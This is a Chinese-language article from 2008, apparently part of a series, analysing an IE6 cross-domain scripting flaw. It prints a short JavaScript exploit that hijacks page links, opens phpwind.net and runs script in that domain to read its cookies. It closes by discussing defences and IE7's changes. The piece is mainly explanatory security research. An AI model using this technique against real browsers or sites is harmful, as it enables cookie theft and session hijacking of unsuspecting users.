揭密鬼页 浅析浏览器跨域安全问题(3)
来源:IT 专家网 时间:2008-10-07 18:11:00
5.灾难性的后果
到这里我们发现了一个IE6的0DAY,一定程度上这个跨域安全问题是灾难性的,如下面的
EXP:
<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open('http://www.phpwind.net');
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links[i].href="javascript:win()"
}
}
</script>
点击链接后,马上得到了PHPWIND论坛的COOKIE,这就意味着黑客通过类似的攻击可以得到你访问过的任意网站的COOKIE,然后劫持你的会话。
这样的漏洞相当于一个没有域限制的XSS漏洞,几乎是无法防御的,网站只能进一步的加强客户端的会话安全,如使用SSL加密连接、设置安全COOKIE加上HTTPONLY参数、给敏感的请求操作加上水印等。
6.总结
这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。
从这个漏洞我们也可以看出IE7的一些新的安全特性,通过继承关系的window对象操作来跨域执行脚本伪协议最后是判断了域的,IE7已经开始防范类似的攻击。
但是这里并没有在本质上解决跨域安全问题,IE7只防范了跨域执行脚本,对于其他跨域的操作仍然是放行的,所以鬼页在IE7下可以跨域操作框架URL,而Firefox却没有存在相同的问题,说明不同浏览器在安全的考虑上也是存在很多差异的。
针对IE我又测试了其他对象方法,发现很多都被限制住了,但不排除还有同样的问题存在。按照类似的思路,大家可以继续尝试挖掘浏览器的一些跨域漏洞。
标签:安全,浏览器,javascript
![](/images/zang.png)
![](/images/jiucuo.png)
猜你喜欢
seo基础之链接知识
2008-12-31 11:18:00
详细全面介绍什么是 Apache服务器
2010-05-08 17:50:00
Sun CEO现财年薪酬减少37% 因上财年过度亏损
2009-10-30 13:17:00
快速打造下雨动态图片 掀非主流伤感风
2009-11-23 14:23:00
![](https://img.aspxhome.com/file/UploadPic/200911/20091125125430428s.gif)
国外域名注册之新手指导
2008-05-20 18:29:00
![](https://img.aspxhome.com/file/UploadPic/20085/20/2008520183836925s.jpg)
Google推出中文AdSense for Mobile
2007-09-19 13:25:00
![](https://img.aspxhome.com/file/UploadPic/20079/19/200791913424328s.jpg)
GoDaddy:如何上传文件到网站 Godaddy
2010-04-23 12:48:00
百度网盟推“贴片推广”业务 受邀会员可投放
2010-04-12 14:49:00
![](https://img.aspxhome.com/file/UploadPic/20104/12/1153300-40s.jpg)
做网站优化的SEOER们 请保持好您的心态
2009-08-23 10:47:00
入门教程:IIS 5.0建Web服务器
2008-12-24 14:44:00
![](https://img.aspxhome.com/file/UploadPic/200812/20081225122815386.jpg)
防范ASP木马的十大基本原则
2007-09-14 10:50:00
如何使用godaddy的免费空间 Godaddy
2010-04-17 12:41:00
WordPress Blog模版设计教程(图)
2010-03-21 15:18:00
![](https://img.aspxhome.com/file/UploadPic/20103/19/2010319171139656s.gif)
如何在Windows Server 2003中配置DNS
2008-12-23 15:56:00
网站改版前需要注意的几个问题
2009-02-01 18:28:00
SEO的垃圾链接的流言蜚语
2007-09-21 11:58:00
Skype乱局将终结 创始人重返独立公司董事会
2009-11-05 10:49:00
用Helix Server架设流媒体服务器
2007-08-06 15:36:00
Godaddy主机产品价格
2010-04-19 12:45:00
谷歌推出新型扩展式广告 考虑用户体验感受
2009-03-06 12:50:00
![](https://img.aspxhome.com/file/UploadPic/20093/6/20093522356-84s.jpg)